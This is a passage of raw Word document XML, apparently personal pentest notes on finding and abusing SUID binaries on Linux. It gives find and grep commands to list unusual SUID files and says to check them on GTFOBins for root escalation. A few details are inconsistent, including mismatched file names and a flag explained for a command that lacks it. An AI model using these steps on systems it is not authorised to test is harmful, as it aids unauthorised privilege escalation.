          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/gpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002077">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002078">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002079">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a file with SUID bit set that belongs to a service (which is common), you can check version by running the binary along with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="208" name="image193.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image193.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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07E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at this section of Linux Smart Enumeration for uncommon SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius SUID video</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit Binaries with the SUID permission bit set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002085">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002086">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID (Set User ID) is a special file permission in Linux and Unix systems that allows a file to be executed with the permissions of the file's owner, rather than the permissions of the user running it (usually root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002087">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002088">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3uuh6u7i1pa6" w:id="283"/>
      <w:bookmarkEnd w:id="283"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find SUID files/binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/: Starts the search from the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-perm /4000: Finds files with the SUID permission bit set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type f: Searches only for files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;/dev/null: Suppresses error messages about inaccessible files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Almost the same as the previous command, so try both</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type f restricts the search to regular files (ignores directories, devices, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="483" name="image473.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image473.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70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2092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you get output like this, go to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId702">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website and copy and paste the binaries (WITHOUT THE FILE PATH) and look to see if there are any SUID privilege escalations. For example, copy and paste "gpasswd" and "capsh". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002093">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find it, look at the "SUID" section and follow instructions</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pla3r1sy3bi0" w:id="284"/>
      <w:bookmarkEnd w:id="284"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out common SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002096">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002097">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v -E '^(/usr/bin/passwd|/usr/bin/su|/usr/bin/sudo|/usr/bin/chsh|/usr/bin/chfn|/usr/bin/newgrp|/usr/bin/mount|/usr/bin/umount|/usr/bin/gpasswd|/usr/bin/at|/bin/ping|/bin/ping6|/bin/umount|/bin/mount|/usr/bin/fusermount3?|/usr/bin/pkexec|/usr/lib/openssh/ssh-keysign|/usr/lib/dbus-1\.0/dbus-daemon-launch-helper|/usr/lib/policykit-1/polkit-agent-helper-1|/usr/libexec/polkit-agent-helper-1|/usr/lib/snapd/snap-confine|/snap/.*)$'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002098">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002099">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I also made a file in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/standardSUID.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so you can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null | sort | grep -vxF -f SUIDstandard.txt | grep -v '^/snap/'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is more scalable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add more to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUIDstandard.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000209F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, if you have a file locally with the output of the SUID, do this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1389"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat SUID.txt | grep -vxF -f SUIDstandard.txt | grep -v '^/snap/'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v1wd2ukzcez6" w:id="285"/>
      <w:bookmarkEnd w:id="285"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to quickly check if something is in GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I compiled a list of all the binaries in GTFOBins in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/SUIDgtfoBins.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, if GTFOBins gets updated, it won't include the new ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use it, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null | grep -F -f SUIDgtfoBins.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, if you have a file locally with the output of the SUID, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1392"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
